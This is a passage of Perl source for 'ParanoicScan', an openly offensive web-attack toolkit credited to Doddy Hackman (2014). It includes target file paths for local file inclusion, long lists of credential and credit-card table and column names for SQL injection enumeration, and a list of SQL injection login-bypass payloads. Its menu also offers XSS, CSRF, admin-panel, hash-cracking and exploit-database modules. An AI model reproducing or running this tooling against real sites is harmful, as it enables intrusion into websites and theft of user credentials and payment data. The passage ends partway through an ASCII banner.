540 | 'C:\MySQL\my.ini', 541 | 'C:\MySQL\my.cnf', 542 | '/etc/logrotate.d/proftpd', 543 | '/www/logs/proftpd.system.log', 544 | '/var/log/proftpd', 545 | '/etc/proftp.conf', 546 | '/etc/protpd/proftpd.conf', 547 | '/etc/vhcs2/proftpd/proftpd.conf', 548 | '/etc/proftpd/modules.conf', 549 | '/var/log/vsftpd.log', 550 | '/etc/vsftpd.chroot_list', 551 | '/etc/logrotate.d/vsftpd.log', 552 | '/etc/vsftpd/vsftpd.conf', 553 | '/etc/vsftpd.conf', 554 | '/etc/chrootUsers', 555 | '/var/log/xferlog', 556 | '/var/adm/log/xferlog', 557 | '/etc/wu-ftpd/ftpaccess', 558 | '/etc/wu-ftpd/ftphosts', 559 | '/etc/wu-ftpd/ftpusers', 560 | '/usr/sbin/pure-config.pl', 561 | '/usr/etc/pure-ftpd.conf', 562 | '/etc/pure-ftpd/pure-ftpd.conf', 563 | '/usr/local/etc/pure-ftpd.conf', 564 | '/usr/local/etc/pureftpd.pdb', 565 | '/usr/local/pureftpd/etc/pureftpd.pdb', 566 | '/usr/local/pureftpd/sbin/pure-config.pl', 567 | '/usr/local/pureftpd/etc/pure-ftpd.conf', 568 | '/etc/pure-ftpd/pure-ftpd.pdb', 569 | '/etc/pureftpd.pdb', 570 | '/etc/pureftpd.passwd', 571 | '/etc/pure-ftpd/pureftpd.pdb', 572 | '/var/log/pure-ftpd/pure-ftpd.log', 573 | '/logs/pure-ftpd.log', 574 | '/var/log/pureftpd.log', 575 | '/var/log/ftp-proxy/ftp-proxy.log', 576 | '/var/log/ftp-proxy', 577 | '/var/log/ftplog', 578 | '/etc/logrotate.d/ftp', 579 | '/etc/ftpchroot', 580 | '/etc/ftphosts', 581 | '/var/log/exim_mainlog', 582 | '/var/log/exim/mainlog', 583 | '/var/log/maillog', 584 | '/var/log/exim_paniclog', 585 | '/var/log/exim/paniclog', 586 | '/var/log/exim/rejectlog', 587 | '/var/log/exim_rejectlog' 588 | ); 589 | my @buscar1 = ( 590 | 'usuario', 'web_users', 591 | 'name', 'names', 592 | 'nombre', 'nombres', 593 | 'usuarios', 'member', 594 | 'members', 'admin_table', 595 | 'usuaris', 'admin', 596 | 'tblUsers', 'tblAdmin', 597 | 'user', 'users', 598 | 'username', 'usernames', 599 | 'web_usuarios', 'miembro', 600 | 'miembros', 'membername', 601 | 'admins', 'administrator', 602 | 'sign', 'config', 603 | 'USUARIS', 'cms_operadores', 604 | 'administrators', 'passwd', 605 | 'password', 'passwords', 606 | 'pass', 'Pass', 607 | 'mpn_authors', 'author', 608 | 'musuario', 'mysql.user', 609 | 'user_names', 'foro', 610 | 'tAdmin', 'tadmin', 611 | 'user_password', 'user_passwords', 612 | 'user_name', 'member_password', 613 | 'mods', 'mod', 614 | 'moderators', 'moderator', 615 | 'user_email', 'jos_users', 616 | 'mb_user', 'host', 617 | 'apellido_nombre', 'user_emails', 618 | 'user_mail', 'user_mails', 619 | 'mail', 'emails', 620 | 'email', 'address', 621 | 'jos_usuarios', 'tutorial_user_auth', 622 | 'e-mail', 'emailaddress', 623 | 'correo', 'correos', 624 | 'phpbb_users', 'log', 625 | 'logins', 'login', 626 | 'tbl_usuarios', 'user_auth', 627 | 'login_radio', 'registers', 628 | 'register', 'usr', 629 | 'usrs', 'ps', 630 | 'pw', 'un', 631 | 'u_name', 'u_pass', 632 | 'tbl_admin', 'usuarios_head', 633 | 'tpassword', 'tPassword', 634 | 'u_password', 'nick', 635 | 'nicks', 'manager', 636 | 'managers', 'administrador', 637 | 'BG_CMS_Users', 'tUser', 638 | 'tUsers', 'administradores', 639 | 'clave', 'login_id', 640 | 'pwd', 'pas', 641 | 'sistema_id', 'foro_usuarios', 642 | 'cliente', 'sistema_usuario', 643 | 'sistema_password', 'contrasena', 644 | 'auth', 'key', 645 | 'senha', 'signin', 646 | 'dir_admin', 'alias', 647 | 'clientes', 'tb_admin', 648 | 'tb_administrator', 'tb_login', 649 | 'tb_logon', 'tb_members_tb_member', 650 | 'calendar_users', 'cursos', 651 | 'tb_users', 'tb_user', 652 | 'tb_sys', 'sys', 653 | 'fazerlogon', 'logon', 654 | 'fazer', 'authorization', 655 | 'curso', 'membros', 656 | 'utilizadores', 'staff', 657 | 'nuke_authors', 'accounts', 658 | 'account', 'accnts', 659 | 'signup', 'leads', 660 | 'lead', 'associated', 661 | 'accnt', 'customers', 662 | 'customer', 'membres', 663 | 'administrateur', 'utilisateur', 664 | 'riacms_users', 'tuser', 665 | 'tusers', 'utilisateurs', 666 | 'amministratore', 'god', 667 | 'God', 'authors', 668 | 'wp_users', 'tb_usuarios', 669 | 'asociado', 'asociados', 670 | 'autores', 'autor', 671 | 'Users', 'Admin', 672 | 'Members', 'tb_usuario', 673 | 'Miembros', 'Usuario', 674 | 'Usuarios', 'ADMIN', 675 | 'USERS', 'USER', 676 | 'MEMBER', 'MEMBERS', 677 | 'USUARIO', 'USUARIOS', 678 | 'MIEMBROS', 'MIEMBRO', 679 | 'USR_NAME', 'about', 680 | 'access', 'admin_id', 681 | 'admin_name', 'admin_pass', 682 | 'admin_passwd', 'admin_password', 683 | 'admin_pwd', 'admin_user', 684 | 'admin_userid', 'admin_username', 685 | 'adminemail', 'adminid', 686 | 'administrator_name', 'adminlogin', 687 | 'adminmail', 'adminname', 688 | 'adminuser', 'adminuserid', 689 | 'adminusername', 'aid', 690 | 'aim', 'apwd', 691 | 'auid', 'authenticate', 692 | 'authentication', 'blog', 693 | 'cc_expires', 'cc_number', 694 | 'cc_owner', 'cc_type', 695 | 'cfg', 'cid', 696 | 'clientname', 'clientpassword', 697 | 'clientusername', 'conf', 698 | 'contact', 'converge_pass_hash', 699 | 'converge_pass_salt', 'crack', 700 | 'customers_email_address', 'customers_password', 701 | 'cvvnumber]', 'data', 702 | 'db_database_name', 'db_hostname', 703 | 'db_password', 'db_username', 704 | 'download', 'e_mail', 705 | 'emer', 'emni', 706 | 'emniplote', 'emri', 707 | 'fjalekalimi', 'fjalekalimin', 708 | 'full', 'gid', 709 | 'group', 'group_name', 710 | 'hash', 'hashsalt', 711 | 'homepage', 'icq', 712 | 'icq_number', 'id', 713 | 'id_group', 'id_member', 714 | 'images', 'ime', 715 | 'index', 'ip_address', 716 | 'kodi', 'korisnici', 717 | 'korisnik', 'kpro_user', 718 | 'last_ip', 'last_login', 719 | 'lastname', 'llogaria', 720 | 'login_admin', 'login_name', 721 | 'login_pass', 'login_passwd', 722 | 'login_password', 'login_pw', 723 | 'login_pwd', 'login_user', 724 | 'login_username', 'logini', 725 | 'loginkey', 'loginout', 726 | 'logo', 'logohu', 727 | 'lozinka', 'md5hash', 728 | 'mem_login', 'mem_pass', 729 | 'mem_passwd', 'mem_password', 730 | 'mem_pwd', 'member_id', 731 | 'member_login_key', 'member_name', 732 | 'memberid', 'memlogin', 733 | 'mempassword', 'my_email', 734 | 'my_name', 'my_password', 735 | 'my_username', 'myname', 736 | 'mypassword', 'myusername', 737 | 'nc', 'new', 738 | 'news', 'number', 739 | 'nummer', 'p_assword', 740 | 'p_word', 'pass_hash', 741 | 'pass_w', 'pass_word', 742 | 'pass1word', 'passw', 743 | 'passwordsalt', 'passwort', 744 | 'passwrd', 'perdorimi', 745 | 'perdoruesi', 'personal_key', 746 | 'phone', 'privacy', 747 | 'psw', 'punetoret', 748 | 'punonjes', 'pword', 749 | 'pwrd', 'salt', 750 | 'search', 'secretanswer', 751 | 'search', 'secretanswer', 752 | 'secretquestion', 'serial', 753 | 'session_member_id', 'session_member_login_key', 754 | 'sesskey', 'setting', 755 | 'sid', 'sifra', 756 | 'spacer', 'status', 757 | 'store', 'store1', 758 | 'store2', 'store3', 759 | 'store4', 'table_prefix', 760 | 'temp_pass', 'temp_password', 761 | 'temppass', 'temppasword', 762 | 'text', 'uid', 763 | 'uname', 'user_admin', 764 | 'user_icq', 'user_id', 765 | 'user_ip', 'user_level', 766 | 'user_login', 'user_n', 767 | 'user_pass', 'user_passw', 768 | 'user_passwd', 'user_pw', 769 | 'user_pwd', 'user_pword', 770 | 'user_pwrd', 'user_un', 771 | 'user_uname', 'user_username', 772 | 'user_usernm', 'user_usernun', 773 | 'user_usrnm', 'user1', 774 | 'useradmin', 'userid', 775 | 'userip', 'userlogin', 776 | 'usern', 'usernm', 777 | 'userpass', 'userpassword', 778 | 'userpw', 'userpwd', 779 | 'usr_n', 'usr_name', 780 | 'usr_pass', 'usr2', 781 | 'usrn', 'usrnam', 782 | 'usrname', 'usrnm', 783 | 'usrpass', 'warez', 784 | 'xar_name', 'xar_pass', 785 | 'nom dutilisateur', 'mot de passe', 786 | 'compte', 'comptes', 787 | 'aide', 'objectif', 788 | 'authentifier', 'authentification', 789 | 'Contact', 'fissure', 790 | 'client', 'clients', 791 | 'de donn?es', 'mot_de_passe_bdd', 792 | 't?l?charger', 'E-mail', 793 | 'adresse e-mail', 'Emer', 794 | 'complet', 'groupe', 795 | 'hachage', 'Page daccueil', 796 | 'Kodi', 'nom', 797 | 'connexion', 'membre', 798 | 'MEMBERNAME', 'mon_mot_de_passe', 799 | 'monmotdepasse', 'ignatiusj', 800 | 'caroline-du-nord', 'nouveau', 801 | 'Nick', 'passer', 802 | 'Passw', 'Mot de passe', 803 | 't?l?phone', 'protection de la vie priv?e', 804 | 'PSW', 'pWord', 805 | 'sel', 'recherche', 806 | 'de s?rie', 'param?tre', 807 | '?tat', 'stocker', 808 | 'texte', 'cvvnumber' 809 | ); 810 | my @buscar2 = ( 811 | 'name', 'user', 812 | 'user_name', 'user_username', 813 | 'uname', 'user_uname', 814 | 'usern', 'user_usern', 815 | 'un', 'user_un', 816 | 'mail', 'cliente', 817 | 'usrnm', 'user_usrnm', 818 | 'usr', 'admin_name', 819 | 'cla_adm', 'usu_adm', 820 | 'fazer', 'logon', 821 | 'fazerlogon', 'authorization', 822 | 'membros', 'utilizadores', 823 | 'sysadmin', 'email', 824 | 'senha', 'username', 825 | 'usernm', 'user_usernm', 826 | 'nm', 'user_nm', 827 | 'login', 'u_name', 828 | 'nombre', 'host', 829 | 'pws', 'cedula', 830 | 'userName', 'host_password', 831 | 'chave', 'alias', 832 | 'apellido_nombre', 'cliente_nombre', 833 | 'cliente_email', 'cliente_pass', 834 | 'cliente_user', 'cliente_usuario', 835 | 'login_id', 'sistema_id', 836 | 'author', 'user_login', 837 | 'admin_user', 'admin_pass', 838 | 'uh_usuario', 'uh_password', 839 | 'psw', 'host_username', 840 | 'sistema_usuario', 'auth', 841 | 'key', 'usuarios_nombre', 842 | 'usuarios_nick', 'usuarios_password', 843 | 'user_clave', 'membername', 844 | 'nme', 'unme', 845 | 'password', 'user_password', 846 | 'autores', 'pass_hash', 847 | 'hash', 'pass', 848 | 'correo', 'usuario_nombre', 849 | 'usuario_nick', 'usuario_password', 850 | 'userpass', 'user_pass', 851 | 'upw', 'pword', 852 | 'user_pword', 'passwd', 853 | 'user_passwd', 'passw', 854 | 'user_passw', 'pwrd', 855 | 'user_pwrd', 'pwd', 856 | 'authors', 'user_pwd', 857 | 'u_pass', 'clave', 858 | 'usuario', 'contrasena', 859 | 'pas', 'sistema_password', 860 | 'autor', 'upassword', 861 | 'web_password', 'web_username', 862 | 'tbladmins', 'sort', 863 | '_wfspro_admin', '4images_users', 864 | 'a_admin', 'account', 865 | 'accounts', 'adm', 866 | 'admin', 'admin_login', 867 | 'admin_userinfo', 'administer', 868 | 'administrable', 'administrate', 869 | 'administration', 'administrator', 870 | 'administrators', 'adminrights', 871 | 'admins', 'adminuser', 872 | 'art', 'article_admin', 873 | 'articles', 'artikel', 874 | 'ÃÜÂë', 'aut', 875 | 'autore', 'backend', 876 | 'backend_users', 'backenduser', 877 | 'bbs', 'book', 878 | 'chat_config', 'chat_messages', 879 | 'chat_users', 'client', 880 | 'clients', 'clubconfig', 881 | 'company', 'config', 882 | 'contact', 'contacts', 883 | 'content', 'control', 884 | 'cpg_config', 'cpg132_users', 885 | 'customer', 'customers', 886 | 'customers_basket', 'dbadmins', 887 | 'dealer', 'dealers', 888 | 'diary', 'download', 889 | 'Dragon_users', 'e107.e107_user', 890 | 'e107_user', 'forum.ibf_members', 891 | 'fusion_user_groups', 'fusion_users', 892 | 'group', 'groups', 893 | 'ibf_admin_sessions', 'ibf_conf_settings', 894 | 'ibf_members', 'ibf_members_converge', 895 | 'ibf_sessions', 'icq', 896 | 'images', 'index', 897 | 'info', 'ipb.ibf_members', 898 | 'ipb_sessions', 'joomla_users', 899 | 'jos_blastchatc_users', 'jos_comprofiler_members', 900 | 'jos_contact_details', 'jos_joomblog_users', 901 | 'jos_messages_cfg', 'jos_moschat_users', 902 | 'jos_users', 'knews_lostpass', 903 | 'korisnici', 'kpro_adminlogs', 904 | 'kpro_user', 'links', 905 | 'login_admin', 'login_admins', 906 | 'login_user', 'login_users', 907 | 'logins', 'logs', 908 | 'lost_pass', 'lost_passwords', 909 | 'lostpass', 'lostpasswords', 910 | 'm_admin', 'main', 911 | 'mambo_session', 'mambo_users', 912 | 'manage', 'manager', 913 | 'mb_users', 'member', 914 | 'memberlist', 'members', 915 | 'minibbtable_users', 'mitglieder', 916 | 'movie', 'movies', 917 | 'mybb_users', 'mysql', 918 | 'mysql.user', 'names', 919 | 'news', 'news_lostpass', 920 | 'newsletter', 'nuke_authors', 921 | 'nuke_bbconfig', 'nuke_config', 922 | 'nuke_popsettings', 'nuke_users', 923 | 'Óû§', 'obb_profiles', 924 | 'order', 'orders', 925 | 'parol', 'partner', 926 | 'partners', 'passes', 927 | 'passwords', 'perdorues', 928 | 'perdoruesit', 'phorum_session', 929 | 'phorum_user', 'phorum_users', 930 | 'phpads_clients', 'phpads_config', 931 | 'phpbb_users', 'phpBB2.forum_users', 932 | 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 933 | 'pma_table_info', 'poll_user', 934 | 'punbb_users', 'pwds', 935 | 'reg_user', 'reg_users', 936 | 'registered', 'reguser', 937 | 'regusers', 'session', 938 | 'sessions', 'settings', 939 | 'shop.cards', 'shop.orders', 940 | 'site_login', 'site_logins', 941 | 'sitelogin', 'sitelogins', 942 | 'sites', 'smallnuke_members', 943 | 'smf_members', 'SS_orders', 944 | 'statistics', 'superuser', 945 | 'sysadmins', 'system', 946 | 'sysuser', 'sysusers', 947 | 'table', 'tables', 948 | 'tb_admin', 'tb_administrator', 949 | 'tb_login', 'tb_member', 950 | 'tb_members', 'tb_user', 951 | 'tb_username', 'tb_usernames', 952 | 'tb_users', 'tbl', 953 | 'tbl_user', 'tbl_users', 954 | 'tbluser', 'tbl_clients', 955 | 'tbl_client', 'tblclients', 956 | 'tblclient', 'test', 957 | 'usebb_members', 'user_admin', 958 | 'user_info', 'user_list', 959 | 'user_logins', 'user_names', 960 | 'usercontrol', 'userinfo', 961 | 'userlist', 'userlogins', 962 | 'usernames', 'userrights', 963 | 'users', 'vb_user', 964 | 'vbulletin_session', 'vbulletin_user', 965 | 'voodoo_members', 'webadmin', 966 | 'webadmins', 'webmaster', 967 | 'webmasters', 'webuser', 968 | 'webusers', 'x_admin', 969 | 'xar_roles', 'xoops_bannerclient', 970 | 'xoops_users', 'yabb_settings', 971 | 'yabbse_settings', 'ACT_INFO', 972 | 'ActiveDataFeed', 'Category', 973 | 'CategoryGroup', 'ChicksPass', 974 | 'ClickTrack', 'Country', 975 | 'CountryCodes1', 'CustomNav', 976 | 'DataFeedPerformance1', 'DataFeedPerformance2', 977 | 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 978 | 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 979 | 'dtproperties', 'Event', 980 | 'Event_backup', 'Event_Category', 981 | 'EventRedirect', 'Events_new', 982 | 'Genre', 'JamPass', 983 | 'MyTicketek', 'MyTicketekArchive', 984 | 'News', 'PerfPassword', 985 | 'PerfPasswordAllSelected', 'Promotion', 986 | 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 987 | 'ProxyPriceInfo', 'Region', 988 | 'SearchOptions', 'Series', 989 | 'Sheldonshows', 'StateList', 990 | 'States', 'SubCategory', 991 | 'Subjects', 'Survey', 992 | 'SurveyAnswer', 'SurveyAnswerOpen', 993 | 'SurveyQuestion', 'SurveyRespondent', 994 | 'sysconstraints', 'syssegments', 995 | 'tblRestrictedPasswords', 'tblRestrictedShows', 996 | 'TimeDiff', 'Titles', 997 | 'ToPacmail1', 'ToPacmail2', 998 | 'UserPreferences', 'uvw_Category', 999 | 'uvw_Pref', 'uvw_Preferences', 1000 | 'Venue', 'venues', 1001 | 'VenuesNew', 'X_3945', 1002 | 'tblArtistCategory', 'tblArtists', 1003 | 'tblConfigs', 'tblLayouts', 1004 | 'tblLogBookAuthor', 'tblLogBookEntry', 1005 | 'tblLogBookImages', 'tblLogBookImport', 1006 | 'tblLogBookUser', 'tblMails', 1007 | 'tblNewCategory', 'tblNews', 1008 | 'tblOrders', 'tblStoneCategory', 1009 | 'tblStones', 'tblUser', 1010 | 'tblWishList', 'VIEW1', 1011 | 'viewLogBookEntry', 'viewStoneArtist', 1012 | 'vwListAllAvailable', 'CC_info', 1013 | 'CC_username', 'cms_user', 1014 | 'cms_users', 'cms_admin', 1015 | 'cms_admins', 'jos_user', 1016 | 'table_user', 'bulletin', 1017 | 'cc_info', 'login_name', 1018 | 'admuserinfo', 'userlistuser_list', 1019 | 'SiteLogin', 'Site_Login', 1020 | 'UserAdmin', 'Admins', 1021 | 'Login', 'Logins' 1022 | ); 1023 | 1024 | my @bypass = split /\n/, <<'EOS'; 1025 | admin'-- 1026 | 'or'1'='1 1027 | 'or' 1028 | ' or 0=0 -- 1029 | " or 0=0 -- 1030 | or 0=0 -- 1031 | ' or 0=0 # 1032 | " or 0=0 # 1033 | or 0=0 # 1034 | ' or 'x'='x 1035 | " or "x"="x 1036 | ') or ('x'='x 1037 | ' or 1=1-- 1038 | " or 1=1-- 1039 | or 1=1-- 1040 | ' or a=a-- 1041 | " or "a"="a 1042 | ') or ('a'='a 1043 | ") or ("a"="a 1044 | hi" or "a"="a 1045 | hi" or 1=1 -- 1046 | hi' or 1=1 -- 1047 | hi' or 'a'='a 1048 | hi') or ('a'='a 1049 | hi") or ("a"="a 1050 | - ' or 'x'='x 1051 | - ' or 'x'='x 1052 | 'or'1 ou 'or''=' 1053 | ' or 'x'='x 1054 | admin' or 1==1 1055 | ' OR "=' 1056 | 'or'1'='1 1057 | EOS 1058 | 1059 | my @files_gen = ( 1060 | 'kobra', 'sql-logs.txt', 1061 | 'logs-bypass.txt', 'jetdb-logs.txt', 1062 | 'mssql-logs.txt', 'oracle-logs.txt', 1063 | 'rfi-logs.txt', 'lfi-logs.txt', 1064 | 'xss-logs.txt', 'fpd-logs.txt', 1065 | 'csrf', 'fsd', 1066 | 'paths-logs.txt', 'admin-logs.txt', 1067 | 'hashes-found.txt', 'http-logs.txt', 1068 | 'exploitdb' 1069 | ); 1070 | 1071 | my @files_chau_gen = ( 1072 | 'kobra.html', 'sqli.html', 'bypass.html', 'jetdb.html', 1073 | 'mssql.html', 'oracle.html', 'rfi.html', 'lfi.html', 1074 | 'xss.html', 'fpd.html', 'csrf.html', 'fsd.html', 1075 | 'paths.html', 'admin.html', 'hash.html', 'http.html', 1076 | 'exploitdb.html' 1077 | ); 1078 | 1079 | my $comienzo_html = qq( 1080 | Logs - ParanoicScan - 1081 | 1082 | 1109 | 1110 |
1111 |

Logs - ParanoicScan -



1112 | ); 1113 | 1114 | my $final_html = qq( 1115 |

-- == (C) Doddy Hackman 2014 == --

1116 | 1117 |
); 1118 | 1119 | my $logs_index = qq( 1120 | Logs - ParanoicScan - 1121 | 1122 | 1149 | 1150 |
1151 |

Logs - ParanoicScan -



1152 | 1153 | 1154 | 1155 | 1156 | 1157 | 1158 | 1159 | 1160 | 1161 | 1162 | 1163 | 1164 | 1165 | 1166 | 1167 | 1168 | 1169 | 1170 | 1171 |
Logs
K0bra
SQLI Links
ByPass
JetDB
MSSQL
Oracle
RFI
LFI
XSS
Full Path Discloure
Cross Site Request Forgery
Full Source Discloure
Paths
Admins
Hashes
HTTP FingerPrinting
ExploitDB
1172 | 1173 |

-- == (C) Doddy Hackman 2014 == --

1174 | 1175 |
1176 | ); 1177 | 1178 | my @logs_central = ( 1179 | "logs", "logs_html", 1180 | "logs/webs", "logs/fsdlogs", 1181 | "logs/csrf", "logs/exploitdb/", 1182 | "logs_html/webs", "logs_html/fsdlogs", 1183 | "logs_html/csrf", "logs_html/exploitdb/" 1184 | ); 1185 | 1186 | ## 1187 | 1188 | for my $log (@logs_central) { 1189 | mkdir( $log, 0777 ); 1190 | } 1191 | 1192 | unless ( -f getcwd() . "/logs_html/logs.html" ) { 1193 | open( FILE, ">>" . getcwd() . "/" . "logs_html/logs.html" ); 1194 | print FILE $logs_index; 1195 | close FILE; 1196 | } 1197 | 1198 | my $nave = LWP::UserAgent->new; 1199 | $nave->agent( $agents[ rand @agents ] ); 1200 | $nave->timeout(10); 1201 | 1202 | my $total_vulnerables; 1203 | 1204 | ##Test Proxy 1205 | 1206 | my $now_proxy; 1207 | my $te = getdatanownownownow(); 1208 | 1209 | if ( $te =~ /proxy=(.*)/ ) { 1210 | $now_proxy = $1; 1211 | $nave->proxy( "http", "http://" . $now_proxy ); 1212 | } 1213 | 1214 | inicio_total(); 1215 | 1216 | sub inicio_total { 1217 | 1218 | head_menu(); 1219 | 1220 | unless ( -f "data.txt" ) { 1221 | instalar(); 1222 | } 1223 | else { 1224 | 1225 | #Start the menu 1226 | my $re = menu_login(); 1227 | printear( "\n\n\t\t\t [+] Checking ...\n\n", "text", "7", "5" ); 1228 | sleep(3); 1229 | if ( $re eq "yes" ) { 1230 | estoydentro(); 1231 | } 1232 | else { 1233 | printear( "\n\t\t\t [-] Bad Login\n\n", "text", "5", "5" ); 1234 | ; 1235 | inicio_total(); 1236 | } 1237 | } 1238 | copyright_menu(); 1239 | } 1240 | 1241 | #Final 1242 | 1243 | sub estoydentro { 1244 | head_menu(); 1245 | menu_central(); 1246 | my $op = printear( "\n\n\t\t\t[+] Option : ", "stdin", "11", "13" ); 1247 | $SIG{INT} = \&estoydentroporahora; ## Comment on this line to compile to exe 1248 | if ( $op eq "1" ) { 1249 | load_paranoic_old(); 1250 | } 1251 | elsif ( $op eq "2" ) { 1252 | load_kobra(); 1253 | } 1254 | elsif ( $op eq "3" ) { 1255 | lfi_scan(); 1256 | } 1257 | elsif ( $op eq "4" ) { 1258 | xss_scan(); 1259 | } 1260 | elsif ( $op eq "5" ) { 1261 | csrf_scan(); 1262 | } 1263 | elsif ( $op eq "6" ) { 1264 | load_bypass(); 1265 | } 1266 | elsif ( $op eq "7" ) { 1267 | load_fsd(); 1268 | } 1269 | elsif ( $op eq "8" ) { 1270 | load_findpaths(); 1271 | } 1272 | elsif ( $op eq "9" ) { 1273 | load_locateip(); 1274 | } 1275 | elsif ( $op eq "10" ) { 1276 | menu_crackhash(); 1277 | adios(); 1278 | } 1279 | elsif ( $op eq "11" ) { 1280 | clean(); 1281 | start_panel(); 1282 | } 1283 | elsif ( $op eq "12" ) { 1284 | httpfinger(); 1285 | } 1286 | elsif ( $op eq "13" ) { 1287 | portscanner(); 1288 | } 1289 | elsif ( $op eq "14" ) { 1290 | encodedecode(); 1291 | } 1292 | elsif ( $op eq "15" ) { 1293 | exploitdb(); 1294 | } 1295 | elsif ( $op eq "16" ) { 1296 | mysqlman(); 1297 | } 1298 | elsif ( $op eq "17" ) { 1299 | load_cmd(); 1300 | } 1301 | elsif ( $op eq "18" ) { 1302 | cargarlogs("logs_html/logs.html"); 1303 | estoydentro(); 1304 | } 1305 | elsif ( $op eq "19" ) { 1306 | head_menu(); 1307 | printear( 1308 | "\n\n\t This program was coded By Doddy Hackman in the year 2014\n\n\n\n", 1309 | "text", "13", "5" 1310 | ); 1311 | ; 1312 | estoydentro(); 1313 | } 1314 | elsif ( $op eq "20" ) { 1315 | my $op = printear( "\n\n\t\t\t[+] Good Bye\n", "stdin", "7", "13" ); 1316 | 1317 | #; 1318 | genlogs(); 1319 | exit(1); 1320 | } 1321 | else { 1322 | estoydentro(); 1323 | } #Fin de control 1324 | } 1325 | 1326 | sub estoydentroporahora { 1327 | my $op = printear( "\n\n\n\t\t[+] Press any key for return to the menu", 1328 | "stdin", "7", "13" ); 1329 | 1330 | #; 1331 | estoydentro(); 1332 | } 1333 | 1334 | sub menu_central { 1335 | 1336 | printear( "\n\n\t\t\t -- == Options == --\n\n", "text", "13", "5" ); 1337 | printear( 1338 | "\n 1339 | \t\t\t[+] 1 : Web Scanner 1340 | \t\t\t[+] 2 : SQLi Scanner 1341 | \t\t\t[+] 3 : LFI Scanner 1342 | \t\t\t[+] 4 : XSS Tool 1343 | \t\t\t[+] 5 : CSRF Tool 1344 | \t\t\t[+] 6 : Bypass Admin 1345 | \t\t\t[+] 7 : FSD Exploit Manager 1346 | \t\t\t[+] 8 : Paths Finder 1347 | \t\t\t[+] 9 : Locate IP 1348 | \t\t\t[+] 10 : Crack MD5 1349 | \t\t\t[+] 11 : Panel Finder 1350 | \t\t\t[+] 12 : HTTP FingerPrinting 1351 | \t\t\t[+] 13 : Port Scanner 1352 | \t\t\t[+] 14 : Encoder & Decoder 1353 | \t\t\t[+] 15 : Exploit DB Manager 1354 | \t\t\t[+] 16 : Mysql Manager 1355 | \t\t\t[+] 17 : Console 1356 | \t\t\t[+] 18 : Generate LOGS 1357 | \t\t\t[+] 19 : About 1358 | \t\t\t[+] 20 : Exit 1359 | ", "logos", "7", "5" 1360 | ); 1361 | } 1362 | 1363 | sub menu_login { 1364 | 1365 | my $test_username = ""; 1366 | my $test_password = ""; 1367 | 1368 | printear( "\n\n\t\t\t -- == Login == --\n\n\n\n", "text", "13", "5" ); 1369 | my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" ); 1370 | my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" ); 1371 | 1372 | my $word = getdatanownownownow(); 1373 | 1374 | if ( $word =~ /username=(.*)/ ) { 1375 | $test_username = $1; 1376 | } 1377 | 1378 | if ( $word =~ /password=(.*)/ ) { 1379 | $test_password = $1; 1380 | } 1381 | 1382 | if ( $test_username eq md5_hex($username) 1383 | and $test_password eq md5_hex($password) ) 1384 | { 1385 | return "yes"; 1386 | } 1387 | else { 1388 | return "no"; 1389 | } 1390 | 1391 | } 1392 | 1393 | sub instalar { 1394 | printear( 1395 | "\n\n\t\t\t -- == Program settings == --\n\n\n\n", "text", 1396 | "13", "5" 1397 | ); 1398 | 1399 | my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" ); 1400 | my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" ); 1401 | my $proxy = printear( "\n\t\t\t[+] Proxy : ", "stdin", "11", "13" ); 1402 | my $colores = 1403 | printear( "\n\t\t\t[+] Colors [y,n] : ", "stdin", "11", "13" ); 1404 | my $efectos = 1405 | printear( "\n\t\t\t[+] Effects [y,n] : ", "stdin", "11", "13" ); 1406 | 1407 | open( FILE, ">>data.txt" ); 1408 | print FILE "username=" . md5_hex($username) . "\n"; 1409 | print FILE "password=" . md5_hex($password) . "\n"; 1410 | if ( $proxy ne "" ) { 1411 | print FILE "proxy=" . $proxy . "\n"; 1412 | } 1413 | print FILE "colors=" . $colores . "\n"; 1414 | print FILE "efect=" . $efectos . "\n"; 1415 | close FILE; 1416 | 1417 | inicio_total(); 1418 | } 1419 | 1420 | sub head_menu { 1421 | clean(); 1422 | printear( " 1423 | 1424 | 1425 | @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ 1426 | @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ 1427 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ 1428 | @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ 1429 | @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ 1430 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ 1431 | @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ 1432 | 1433 | 1434 | ", "logos", "13", "5" ); 1435 | 1436 | if ( $^O =~ /Win32/ ) { 1437 | 1438 | printear( " 1439 | 1440 | \t\t _____ 1441 | \t\t ,----/,--. `. 1442 | \t\t / '. `-' \ 1443 | \t\t | ____ \ '`|_ 1444 | \t\t \'.--._/` _ \ '. 1445 | \t\t /'-|/ \|`\|-` \ 1446 | \t\t / / \ | 1447 | \t\t | ; '` | .' 1448 | \t\t '. |;; ; / 1449 | \t\t \ \ ; / ,' 1450 | \t\t ;--, .,--, 1451 | \t\t __||=|=|./|=|=||___ 1452 | \t\t `'-'-' `-'-'` 1453 | \t\t ______________________ 1454 | \t\t /'/ / \ \ \ 1455 | \t\t / '.'; ; \ ' \ 1456 | \t\t '-/ | ; | ; \-' 1457 | \t\t \_| | | |_/ 1458 | \t\t `-'\_/`-' 1459 | \t\t 1460 | 1461 | ", "logos", "7", "5" ); 1462 | 1463 | } 1464 | else { 1465 | 1466 | printear( " 1467 | 1468 | 1469 | 1470 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ 1471 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1472 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1473 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1474 | \t\t 